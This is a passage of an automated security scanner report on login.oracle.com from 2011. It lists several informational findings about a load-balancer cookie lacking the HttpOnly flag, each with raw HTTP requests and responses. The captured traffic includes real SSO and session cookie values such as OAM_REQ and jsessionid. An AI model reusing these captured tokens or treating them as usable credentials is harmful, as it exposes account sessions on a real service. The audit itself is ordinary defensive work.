previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/signon.jsp
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /mysso/signon.jsp HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~40F0BA36~0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010418767AFB7CACAE1E8A1D5BC67D978240D0CFE377F5A9ADE3F9C63F1468D714D8960345942853A8A315C8DEC76320F764A19C14D049E8440950AC3FCB19E8C4625DF9A3218AC7A9ED349F2636076CCFF871747F137DD74D5C63E78617CA86A85534A4BE22A035A1A5C4CE436DAA199E4D86DF00E9AC3337241384508207C772ECABF9255F75DBC84BE0AD6B9337EBE668883113A8DBFD3E00FEA9314357 Content-Length: 2822 Cache-Control: max-age=0 Origin: https://login.oracle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000 site2pstoretoken=v1.4%7E40F0BA36%7E0FE16C859C981BB9E73EC1BCB9520947AE23F3021BDE9E6E23623271A3C2A398FE62ABE37945281257E1D3B824BF88141320CDBA0FF76662E24760C533E30D1DCDABEEFDEB72A48E4C6C9ABEDBAF51A9F1010...[SNIP]...
Response
HTTP/1.1 200 OK Cache-Control: no-cache Date: Tue, 06 Sep 2011 16:14:14 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Expires: 0 Set-Cookie: ORA_UCM_VER=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/ Set-Cookie: ORA_UCM_SRVC=; domain=.oracle.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/ X-ORACLE-DMS-ECID: 0000J8zXBRM6uHK6EVADUS1EHWFB01t_bQ X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/ Content-Length: 14934 <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html...[SNIP]...
13.88. https://login.oracle.com/mysso/sso_loginui/b-bg.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/b-bg.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/b-bg.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:17 GMT Accept-Ranges: bytes Content-Length: 51 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCB_6uHK6EVADUS1EHWFB01t_ck X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ GIF89a...................!.......,..............P.;
13.89. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/b-l-corner.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/b-l-corner.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:17 GMT Accept-Ranges: bytes Content-Length: 188 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCBj6uHK6EVADUS1EHWFB01t_cl X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ GIF89a.......................................................................................................!.......,..........9.4.dY.f:........@..=./\H....k.......$t..D.(....t;M...x...;
13.90. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/b-r-corner.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/b-r-corner.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPjRodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:14:19 GMT Accept-Ranges: bytes Content-Length: 190 Content-Type: image/gif Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT X-ORACLE-DMS-ECID: 0000J8zXCXF6uHK6EVADUS1EHWFB01t_dQ X-Powered-By: Servlet/2.5 JSP/2.1Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/ GIF89a.......................................................................................................!.......,..........; %.$9..x..../y.1A...NB,6...2Y.b.I...L..V.0. "...*.8H..8. .B.;
13.91. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://login.oracle.com
Path:
/mysso/sso_loginui/gray-b-l-b.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mysso/sso_loginui/gray-b-l-b.gif HTTP/1.1 Host: login.oracle.com Connection: keep-alive Referer: https://login.oracle.com/mysso/signon.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJ